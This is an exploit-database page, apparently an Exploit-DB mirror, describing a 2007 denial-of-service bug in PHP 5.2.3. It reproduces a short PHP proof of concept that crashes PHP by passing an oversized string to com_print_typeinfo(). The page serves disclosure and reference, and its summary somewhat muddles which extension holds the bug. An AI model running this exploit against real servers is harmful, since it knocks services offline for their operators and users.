header-logo
Suggest Exploit
vendor:
PHP
by:
shinnai
7.5
CVSS
HIGH
Remote Denial of Service (DoS)
CWE
Product Name: PHP
Affected Version From: PHP 5.2.3
Affected Version To: PHP 5.2.3
Patch Exists: NO
Related CWE:
CPE: a:php:php:5.2.3
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 (CLI and Apache)
2007

PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit

This exploit targets a vulnerability in the bz2 extension of PHP version 5.2.3. By using the com_print_typeinfo() function, an attacker can trigger a remote denial of service (DoS) attack. The vulnerability was discovered by shinnai and can be exploited on Windows XP SP2, both from the command line interface (CLI) and on Apache web server.

Mitigation:

Ensure that the bz2 extension is not loaded or apply the necessary patches and updates provided by the vendor.
Source

Exploit-DB raw data:

<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp sp2, worked both from the cli and on apache

//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar

if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}

$buff = str_repeat("a",1000);

com_print_typeinfo($buff);

?>

# milw0rm.com [2007-07-12]

Navigation

Suggest Exploit

Services By CQR